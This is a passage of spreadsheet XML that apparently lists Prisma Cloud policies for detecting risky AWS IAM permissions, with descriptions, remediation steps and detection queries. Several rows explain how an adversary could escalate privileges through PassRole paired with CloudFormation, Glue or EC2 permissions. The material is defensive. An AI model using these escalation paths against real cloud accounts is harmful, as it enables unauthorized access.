          <t>HIGH_PRIVILEGED_ROLE</t>
        </is>
      </c>
      <c r="M3164" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3164" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3164" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3164" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3164" t="inlineStr"/>
      <c r="R3164" t="inlineStr"/>
      <c r="S3164" t="inlineStr"/>
      <c r="T3164" t="b">
        <v>1</v>
      </c>
      <c r="U3164" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3164" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3164"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164" t="inlineStr">
        <is>
          <t>Remediation steps:
1. Log in to the AWS console
2. Navigate to the AWS EC2 service
3. Find the role used by the EC2 instance
4. Navigate to the IAM service
5. Click on Roles
6. Choose the relevant role
7. Under ''Permissions policies'', find the relevant policy according to the alert details and narrow down the wildcard permissions</t>
        </is>
      </c>
      <c r="Y316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4" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'AWS' and dest.cloud.resource.name = '*' AND source.cloud.service.name = 'ec2' AND source.cloud.resource.type = 'instance'</t>
        </is>
      </c>
      <c r="AA3164" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3164" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3164" t="inlineStr"/>
      <c r="AD3164" t="b">
        <v>1</v>
      </c>
      <c r="AE3164" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3164" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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4" t="inlineStr">
        <is>
          <t>35cff4c0-1500-4863-9e98-9fd9c881ad08</t>
        </is>
      </c>
      <c r="AI3164" t="inlineStr">
        <is>
          <t>35cff4c0-1500-4863-9e98-9fd9c881ad08</t>
        </is>
      </c>
      <c r="AJ3164" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3164" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3165">
      <c r="A3165" t="inlineStr"/>
      <c r="B3165" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3165" s="2" t="inlineStr"/>
      <c r="D3165" t="inlineStr"/>
      <c r="E3165" t="inlineStr"/>
      <c r="F3165" t="inlineStr"/>
      <c r="G3165" t="b">
        <v>1</v>
      </c>
      <c r="H31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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3165" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3165" t="inlineStr">
        <is>
          <t>AWS IAM Groups and Roles with IAM Metadata Write permissions are unused for 90 days</t>
        </is>
      </c>
      <c r="L3165" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3165" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3165" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3165" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3165" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3165" t="inlineStr"/>
      <c r="R3165" t="inlineStr"/>
      <c r="S3165" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T3165" t="b">
        <v>0</v>
      </c>
      <c r="U3165" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3165" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3165" t="inlineStr">
        <is>
          <t>This policy identifies AWS IAM Groups and Roles with Stale IAM  Metadata Write Permissions.
Risk of Unused Metadata Write Permissions:
IAM groups and roles with Unused IAM  Metadata Write permissions for 90 days pose a security risk because:
Information Gathering Tool: An attacker with access to these credentials could leverage them to gather details about your AWS environment. This information could include instance IDs, security group configurations, or IAM user details. Attackers could exploit this knowledge to identify vulnerabilities or plan further intrusions.
Potential Privilege Escalation: If compromised, unused roles with Metadata Write permissions could be used by attackers to escalate privileges within your AWS environment. They might exploit these permissions to gain access to more sensitive resources or perform unauthorized actions.
Mitigating the Risk:
Regular Review and Removal: Proactively identify and remove unused IAM groups and roles with any level of IAM  Metadata access (Read or Write) on a regular basis.
Principle of Least Privilege: Always adhere to the principle of least privilege when assigning IAM permissions. Grant only the minimum level of Metadata Write access required for a group or role to function ly. Evaluate if alternative methods, like IAM conditions, can restrict access to specific EC2 instances.
Monitor for Unusual Activity: Utilize CloudTrail to track API calls made within your AWS environment, including those leveraging IAM roles. This vigilance can help detect unusual activity related to unused roles that might indicate a compromise.</t>
        </is>
      </c>
      <c r="X3165"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165" t="inlineStr"/>
      <c r="Z3165" t="inlineStr">
        <is>
          <t>config from iam where source.cloud.type = 'AWS' and grantedby.cloud.entity.type NOT IN ('user') AND grantedby.cloud.policy.type != 'Resource-based Policy' AND action.access.level = 'Metadata Write' and action.lastaccess.days &gt; 90</t>
        </is>
      </c>
      <c r="AA3165" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3165" t="inlineStr">
        <is>
          <t>2024-09-27 06:26:54</t>
        </is>
      </c>
      <c r="AC3165" t="inlineStr"/>
      <c r="AD3165" t="b">
        <v>1</v>
      </c>
      <c r="AE3165" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3165" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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5" t="inlineStr">
        <is>
          <t>7f43a027-51a4-4d2b-ab2a-fa06ff12501f</t>
        </is>
      </c>
      <c r="AI3165" t="inlineStr">
        <is>
          <t>7f43a027-51a4-4d2b-ab2a-fa06ff12501f</t>
        </is>
      </c>
      <c r="AJ3165" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3165" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3166">
      <c r="A3166" t="inlineStr"/>
      <c r="B3166" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3166" s="2" t="inlineStr"/>
      <c r="D3166" t="n">
        <v>453</v>
      </c>
      <c r="E3166" t="n">
        <v>37</v>
      </c>
      <c r="F3166" t="n">
        <v>32</v>
      </c>
      <c r="G3166" t="b">
        <v>1</v>
      </c>
      <c r="H31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6" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3166" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3166" t="inlineStr">
        <is>
          <t>Roles with high privileges can be assumed by a service in an external account</t>
        </is>
      </c>
      <c r="L3166" t="inlineStr">
        <is>
          <t>CROSS_ACCOUNT_TRUST</t>
        </is>
      </c>
      <c r="M3166" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3166" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3166" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3166" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3166" t="inlineStr"/>
      <c r="R3166" t="inlineStr"/>
      <c r="S3166" t="inlineStr"/>
      <c r="T3166" t="b">
        <v>1</v>
      </c>
      <c r="U3166" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3166" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3166" t="inlineStr">
        <is>
          <t>Identifies roles which have administrative permissions and can be assumed by an identity in an "external account". An external account is one not known to Prisma cloud as part of your organization and not that of a known vendor. This policy relies on the default account group, therefore if the group is changed this policy will not reflect the environment entirely. The default account group is created upon onboarding to Prisma Cloud, and contains all instance-related accounts known to Prisma Cloud. External accounts are considered as such if Prisma are unaware of them in the context of your environment (i.e not part of the onboarded accounts). As we do not have visibility or control over the external entity, giving it the ability to gain administartive permissions in the environment is considered high risk.</t>
        </is>
      </c>
      <c r="X3166" t="inlineStr">
        <is>
          <t>How to investigate?
1. In the Prisma Cloud Console, select 'Investigate'
2. Paste the following query into the investigation prompt, replacing the placeholder with the account ID you wish to verify: config from iam where dest.cloud.type = 'AWS' AND source.cloud.account='&lt;account-id&gt;' and dest.cloud.account='&lt;account-id&gt;'
3a. If results are returned, this is an indicator that Prisma is scanning the account, and as such is aware of it
 If this is the case, select 'settings' and then 'Account Groups'
 Search for the default account group, under 'Actions' select 'Edit'. Search for the account in question and add it
3b. If no results are returned, this means Prisma has no knowledge of the account in question (i.e it is not onboarded and in the eyes of Prisma, external)
 In order to continue the investigation, using the AWS CLI, run 'aws organizations list-accounts', and you will recieve a list of all the accounts within the AWS organization
 Repeat this process for every AWS organization you own. If the account in question does not appear, it can be concluded as external
 In order to remove its access, use the following remediation steps:
 Log in to your AWS account
 Navigate to the affected role, and select the 'Trusted entities' tab.
 Select 'Edit trust policy' and remove the entries allowing assumption from external sources.
 Ensure the remaining entries are required, and save your changes.</t>
        </is>
      </c>
      <c r="Y316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6" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'AWS' AND grantedby.cloud.entity.type = 'role' AND action.access.isAdministrative = true AND source.cloud.accountgroup != 'Default Account Group' AND source.cloud.account.isvendor = false</t>
        </is>
      </c>
      <c r="AA3166" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3166" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3166" t="inlineStr"/>
      <c r="AD3166" t="b">
        <v>1</v>
      </c>
      <c r="AE3166" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3166" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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6" t="inlineStr">
        <is>
          <t>d8081638-47d9-4846-88a9-e63157161914</t>
        </is>
      </c>
      <c r="AI3166" t="inlineStr">
        <is>
          <t>d8081638-47d9-4846-88a9-e63157161914</t>
        </is>
      </c>
      <c r="AJ3166" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3166" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3167">
      <c r="A3167" t="inlineStr"/>
      <c r="B3167" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3167" s="2" t="inlineStr"/>
      <c r="D3167" t="n">
        <v>0</v>
      </c>
      <c r="E3167" t="n">
        <v>181</v>
      </c>
      <c r="F3167" t="n">
        <v>0</v>
      </c>
      <c r="G3167" t="b">
        <v>1</v>
      </c>
      <c r="H31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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3167" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3167" t="inlineStr">
        <is>
          <t>AWS IAM policy allows Privilege escalation via PassRole &amp; CloudFormation stack permissions</t>
        </is>
      </c>
      <c r="L3167" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3167" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3167" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3167" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3167" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3167" t="inlineStr"/>
      <c r="R3167" t="inlineStr"/>
      <c r="S3167" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3167" t="b">
        <v>1</v>
      </c>
      <c r="U3167" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3167" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3167" t="inlineStr">
        <is>
          <t>With access to the iam:PassRole and cloudformation:CreateStack permissions, an adversary can create a new CloudFormation stack and pass a more privileged role to it. This would allow an adversary to escalate privileges to the more privileged role.</t>
        </is>
      </c>
      <c r="X3167" t="inlineStr">
        <is>
          <t>Do not use wildcards in a policy's statement Resource element with these permissions, as it creates a risk of Privilege Escalation. If identity requires the use of these permissions to pass a role to a cloud formation stack, make sure the policy is scoped to only the resources needed.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6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7" t="inlineStr">
        <is>
          <t>config from iam where action.name CONTAINS ALL ( 'iam:PassRole', 'cloudformation:CreateStack', 'cloudformation:DescribeStacks') AND dest.cloud.wildcardscope = true and grantedby.cloud.policy.condition ('iam:PassedToService') does not exist</t>
        </is>
      </c>
      <c r="AA3167" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3167" t="inlineStr">
        <is>
          <t>2023-07-21 05:30:51</t>
        </is>
      </c>
      <c r="AC3167" t="inlineStr"/>
      <c r="AD3167" t="b">
        <v>1</v>
      </c>
      <c r="AE3167" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3167" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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7" t="inlineStr">
        <is>
          <t>d3212d1c-37fc-4a26-bd82-c9d3022fe648</t>
        </is>
      </c>
      <c r="AI3167" t="inlineStr">
        <is>
          <t>d3212d1c-37fc-4a26-bd82-c9d3022fe648</t>
        </is>
      </c>
      <c r="AJ3167" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3167" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3168">
      <c r="A3168" t="inlineStr"/>
      <c r="B3168" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3168" s="2" t="inlineStr"/>
      <c r="D3168" t="n">
        <v>0</v>
      </c>
      <c r="E3168" t="n">
        <v>12</v>
      </c>
      <c r="F3168" t="n">
        <v>0</v>
      </c>
      <c r="G3168" t="b">
        <v>1</v>
      </c>
      <c r="H31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8" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3168" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3168" t="inlineStr">
        <is>
          <t>AWS EC2 with write permissions on security group</t>
        </is>
      </c>
      <c r="L3168" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3168" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3168" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3168" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3168" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3168" t="inlineStr"/>
      <c r="R3168" t="inlineStr"/>
      <c r="S3168" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3168" t="b">
        <v>1</v>
      </c>
      <c r="U3168" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3168" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3168" t="inlineStr">
        <is>
          <t>This Policy identifies ec2 instance with permissions control security group access to various AWS services, including RDS, EC2, and Redshift. They enable actions such as creating and deleting security groups, modifying access rules, and associating security groups with load balancers. While granting these permissions can enhance operational flexibility, it is crucial to exercise caution. Mishandling these permissions could lead to unauthorized access, misconfigurations, or potential data breaches.  It is recommended to assign and manage these permissions to trusted individuals to maintain security posture for AWS resources.</t>
        </is>
      </c>
      <c r="X3168"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6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8" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'AWS' AND action.name IN ('rds:CreateDBSecurityGroup','rds:DeleteDBSecurityGroup','rds:RevokeDBSecurityGroupIngress','ec2:AuthorizeSecurityGroupEgress','ec2:AuthorizeSecurityGroupIngress','ec2:CreateSecurityGroup','ec2:DeleteSecurityGroup','ec2:ModifySecurityGroupRules','ec2:RevokeSecurityGroupEgress','ec2:RevokeSecurityGroupIngress','elasticloadbalancing:ApplySecurityGroupsToLoadBalancer','elasticloadbalancing:SetSecurityGroups','redshift:AuthorizeClusterSecurityGroupIngress','redshift:CreateClusterSecurityGroup','redshift:DeleteClusterSecurityGroup') AND source.cloud.service.name = 'ec2' AND source.cloud.resource.type = 'instance'</t>
        </is>
      </c>
      <c r="AA3168" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3168" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3168" t="inlineStr"/>
      <c r="AD3168" t="b">
        <v>1</v>
      </c>
      <c r="AE3168" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3168" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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8" t="inlineStr">
        <is>
          <t>400aa03b-781c-44c7-812c-a3fddce989ad</t>
        </is>
      </c>
      <c r="AI3168" t="inlineStr">
        <is>
          <t>400aa03b-781c-44c7-812c-a3fddce989ad</t>
        </is>
      </c>
      <c r="AJ3168" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3168" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3169">
      <c r="A3169" t="inlineStr"/>
      <c r="B3169" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3169" s="2" t="inlineStr"/>
      <c r="D3169" t="n">
        <v>0</v>
      </c>
      <c r="E3169" t="n">
        <v>101</v>
      </c>
      <c r="F3169" t="n">
        <v>0</v>
      </c>
      <c r="G3169" t="b">
        <v>1</v>
      </c>
      <c r="H31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69" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3169" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3169" t="inlineStr">
        <is>
          <t>AWS Compute Instance (EC2/Lambda) Assigned Permissions to Run EC2 Instances Which Could Lead to Privilege Escalation</t>
        </is>
      </c>
      <c r="L3169" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3169" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3169" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3169" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3169" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3169" t="inlineStr"/>
      <c r="R3169" t="inlineStr"/>
      <c r="S3169" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3169" t="b">
        <v>1</v>
      </c>
      <c r="U3169" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3169" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3169" t="inlineStr">
        <is>
          <t>An adversary able to run EC2 instances with any role would be able to escalate their permissions by attaching a privileged role to the instance. As such, they would obtain the permissions of the role attached to the EC2, allowing further enumeration and exploitation of the environment.</t>
        </is>
      </c>
      <c r="X3169" t="inlineStr">
        <is>
          <t>Remediation steps:
 1. Sign in to AWS Console
 2.Navigate to the EC2 instance or Lambda Function, and either replace the role for a less privileged one, or remove it entirely. If the role is not in use by any other entities, you could simply remove the role's excessive permissions.</t>
        </is>
      </c>
      <c r="Y316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69" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'AWS' AND action.name CONTAINS ALL ('iam:PassRole', 'ec2:RunInstances') AND source.cloud.resource.type IN ('instance', 'function')</t>
        </is>
      </c>
      <c r="AA3169" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3169" t="inlineStr">
        <is>
          <t>2024-10-30 16:57:22</t>
        </is>
      </c>
      <c r="AC3169" t="inlineStr"/>
      <c r="AD3169" t="b">
        <v>1</v>
      </c>
      <c r="AE3169" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3169" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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69" t="inlineStr">
        <is>
          <t>cf87131d-0fa0-4f58-b4f1-6a401d89ee9f</t>
        </is>
      </c>
      <c r="AI3169" t="inlineStr">
        <is>
          <t>cf87131d-0fa0-4f58-b4f1-6a401d89ee9f</t>
        </is>
      </c>
      <c r="AJ3169" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3169" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3170">
      <c r="A3170" t="inlineStr"/>
      <c r="B3170" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3170" s="2" t="inlineStr"/>
      <c r="D3170" t="n">
        <v>0</v>
      </c>
      <c r="E3170" t="n">
        <v>121</v>
      </c>
      <c r="F3170" t="n">
        <v>0</v>
      </c>
      <c r="G3170" t="b">
        <v>1</v>
      </c>
      <c r="H31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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3170" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3170" t="inlineStr">
        <is>
          <t>AWS IAM policy allows Privilege escalation via PassRole &amp; Glue update job permissions</t>
        </is>
      </c>
      <c r="L3170" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3170" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3170" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3170" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3170" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3170" t="inlineStr"/>
      <c r="R3170" t="inlineStr"/>
      <c r="S3170" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3170" t="b">
        <v>1</v>
      </c>
      <c r="U3170" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3170" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3170" t="inlineStr">
        <is>
          <t>With access to the iam:PassRole and glue:UpdateJob permissions, an adversary can update the role and command associated with a Glue job. This would allow an adversary to escalate privileges to a more privileged role.</t>
        </is>
      </c>
      <c r="X3170"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7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0" t="inlineStr">
        <is>
          <t>config from iam where action.name CONTAINS ALL ( 'iam:PassRole', 'glue:UpdateJob' ) AND dest.cloud.wildcardscope = true and grantedby.cloud.policy.condition ('iam:PassedToService') does not exist and source.cloud.resource.id DOES NOT END WITH ':root'</t>
        </is>
      </c>
      <c r="AA3170" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3170" t="inlineStr">
        <is>
          <t>2023-12-08 03:58:20</t>
        </is>
      </c>
      <c r="AC3170" t="inlineStr"/>
      <c r="AD3170" t="b">
        <v>1</v>
      </c>
      <c r="AE3170" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3170" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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0" t="inlineStr">
        <is>
          <t>8b4666f0-aea9-4ca5-a34b-2b6bc661a822</t>
        </is>
      </c>
      <c r="AI3170" t="inlineStr">
        <is>
          <t>8b4666f0-aea9-4ca5-a34b-2b6bc661a822</t>
        </is>
      </c>
      <c r="AJ3170" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3170" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3171">
      <c r="A3171" t="inlineStr"/>
      <c r="B3171" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3171" s="2" t="inlineStr"/>
      <c r="D3171" t="n">
        <v>2</v>
      </c>
      <c r="E3171" t="n">
        <v>40</v>
      </c>
      <c r="F3171" t="n">
        <v>0</v>
      </c>
      <c r="G3171" t="b">
        <v>1</v>
      </c>
      <c r="H31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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3171" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3171" t="inlineStr">
        <is>
          <t>AWS Lambda Function with AWS Organization management permissions</t>
        </is>
      </c>
      <c r="L3171" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE</t>
        </is>
      </c>
      <c r="M3171" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3171" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3171" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3171" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3171" t="inlineStr"/>
      <c r="R3171" t="inlineStr"/>
      <c r="S3171" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3171" t="b">
        <v>1</v>
      </c>
      <c r="U3171" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3171" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3171" t="inlineStr">
        <is>
          <t>This policy identifies IAM permissions that allow Lambda functions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171" t="inlineStr">
        <is>
          <t>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17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1"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source.cloud.service.name = 'lambda' AND source.cloud.resource.type = 'function'</t>
        </is>
      </c>
      <c r="AA3171" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3171" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3171" t="inlineStr"/>
      <c r="AD3171" t="b">
        <v>1</v>
      </c>
      <c r="AE3171" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3171" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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1" t="inlineStr">
        <is>
          <t>741ef058-8816-49d0-87be-a714ae1ce2df</t>
        </is>
      </c>
      <c r="AI3171" t="inlineStr">
        <is>
          <t>741ef058-8816-49d0-87be-a714ae1ce2df</t>
        </is>
      </c>
      <c r="AJ3171" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3171" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3172">
      <c r="A3172" t="inlineStr"/>
      <c r="B3172" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3172" s="2" t="inlineStr"/>
      <c r="D3172" t="n">
        <v>0</v>
      </c>
      <c r="E3172" t="n">
        <v>0</v>
      </c>
      <c r="F3172" t="n">
        <v>512</v>
      </c>
      <c r="G3172" t="b">
        <v>1</v>
      </c>
      <c r="H31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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3172" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3172" t="inlineStr">
        <is>
          <t>AWS IAM Groups and Roles with Excessive Policies</t>
        </is>
      </c>
      <c r="L3172" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3172" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3172" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3172" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3172" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3172" t="inlineStr"/>
      <c r="R3172" t="inlineStr"/>
      <c r="S3172" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T3172" t="b">
        <v>0</v>
      </c>
      <c r="U3172" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3172" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3172" t="inlineStr">
        <is>
          <t>This policy identifies AWS IAM policies that contain '*' in the Action or/and Resource section. IAM policies control user permissions in AWS. Using '*' in the Action or Resource section grants very broad permissions. This means a user with such a policy could perform almost any action on any resource, bypassing intended security restrictions. This is risky because it increases the attack surface and potential damage if an attacker gains access to those credentials.
In simpler terms, a '*' wildcard is like giving someone a master key to your entire AWS cloud. It's best to use specific permissions to minimize risk.</t>
        </is>
      </c>
      <c r="X3172"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172" t="inlineStr"/>
      <c r="Z3172" t="inlineStr">
        <is>
          <t>config from iam where source.cloud.type = 'AWS' and grantedby.cloud.entity.type NOT IN ('user') AND grantedby.cloud.policy.type != 'Resource-based Policy' and grantedby.cloud.policy.isexcessive = true</t>
        </is>
      </c>
      <c r="AA3172" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3172" t="inlineStr">
        <is>
